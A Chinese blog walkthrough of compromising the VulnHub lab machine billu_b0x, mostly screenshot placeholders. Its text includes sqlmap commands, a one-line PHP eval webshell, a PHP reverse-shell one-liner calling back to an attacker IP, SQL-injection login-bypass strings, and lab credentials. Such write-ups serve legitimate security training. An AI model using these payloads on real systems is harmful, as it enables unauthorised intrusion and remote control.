7、billub0x(VulnHub)

billub0x

一、nmap

image-20240323140946311

image-20240323140953227

image-20240323141047408

image-20240323141101966

image-20240323141231646

二、web渗透

随便看看

image-20240323141322974

万能密码

没戏

image-20240323141704980

bp抓包导成文件

image-20240323143104168

sqlmap

sqlmap -r sql.txt --batch --dbs --random-agent -p "un"
sqlmap -r sql.txt --batch --dbs --random-agent -p "ps"

都没有什么结果

image-20240323144652186

目录爆破

image-20240323144722046

image-20240323145823866

image-20240323144734920

图片隐写

一共有六张图片,两张图片看以来一样,还有一张图片是坏的

image-20240323145016681

查看坏图片

image-20240323145142676

其他感觉也没有必要去看,应该不会有隐写的

add/add.php

image-20240323150552029

这里无法上传,后续登入后发现能上传的,估计就是没有session无法上传了

/in

image-20240323150702793

/phpmy/

image-20240323150718694

test/test.php

image-20240323150735991

wfuzz test/test.php

image-20240323151630427

test/test.php的file参数

image-20240323151723261

image-20240323151751806

神奇的事情发生了

image-20240323152101940

我们使用bp吧,看上去像一个文件包含,而不是文件读取,如果前面加上cat的话就又不行了

image-20240323152202652

c.php

image-20240323154233396

$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");

image-20240323155143902

继续/phpmy/

billu/b0x_billu成功进入phpmyadmin

image-20240323155346984

一组凭据
biLLu/hEx_it

ssh登入失败

image-20240323155638240

/panel -> index.php 登入

image-20240323162111402

image-20240323162134802

又看到熟悉的界面

image-20240323162152845

文件上传

存在白名单

image-20240323162237703

用于测试的文件,可以正常上传

image-20240323215640046

尝试上传webshell

<?php eval($_POST['cmd']);?>

image-20240323220051698

image-20240323220114004

image-20240323220153952

文件包含漏洞

我们尝试一下抓取这个数据包,看到着一些参数所显示的内容,判断出show这个参数的位置应该是一个文件包含

image-20240323222156476

确实。他也成功的包含出来了

image-20240323222306188

完了,貌似恶意代码没有被写进去

image-20240323222516298

重新整理思路,替换函数重新上传

image-20240324084100354

上传成功

image-20240324084216271

成功利用

image-20240324084251448

image-20240324084321566

php反弹shell

既然可以直接命令执行,那直接上反弹shell

php -r '$sock=fsockopen("192.168.126.201",11111);exec("/bin/sh -i <&3 >&3 2>&3");'

貌似没有什么反应

image-20240324085020342

最简单的尝试加个url编码看看,成功接收到反弹shell

image-20240324085143914

三、内网渗透

随便看看

image-20240324085257393

寻找提权途径

好像没啥招式了

image-20240324085807606

searchsploit

image-20240324090338990

下载编译运行提权成功

image-20240324090524015

这个靶场没有flag,那么成功结束

四、拓展

这个靶场还留给我们很多思路

源码审计

发现了前端简单的斜杠绕过

image-20240324092238756

'or 1=1 --+
'or 1=1 -- \			成功绕过登入

image-20240324094305427

image-20240324094318295

没有过滤,file的文件包含

image-20240324092740693

在/phpmy/中的目录爆破到roo用户登入

我们拿敏感路径的大字典去跑

image-20240324091812588

phpmyadmin数据库的一些基本信息,我们当然也有利于去判断它是否是密码复用

image-20240324092411262

尝试ssh

ssh root@192.168.126.218
roottoor

完美,直接是以root权限进入

image-20240324092602834

后记

确实,能不用系统漏洞的就别用系统内核漏洞进行攻击提权。系统内核漏洞提权一段时间后,靶机系统崩溃,业务被迫中断,我后续想进行其他一些操作也就只能被迫停止,这样必然会受到应急等情况的。

不过还好,重新启动靶机这个问题暂时性的解决了,后续还会有什么系统问题就咱不得而知了。

posted @ 2024-03-24 09:53  gcc_com  阅读(48)  评论(0编辑  收藏  举报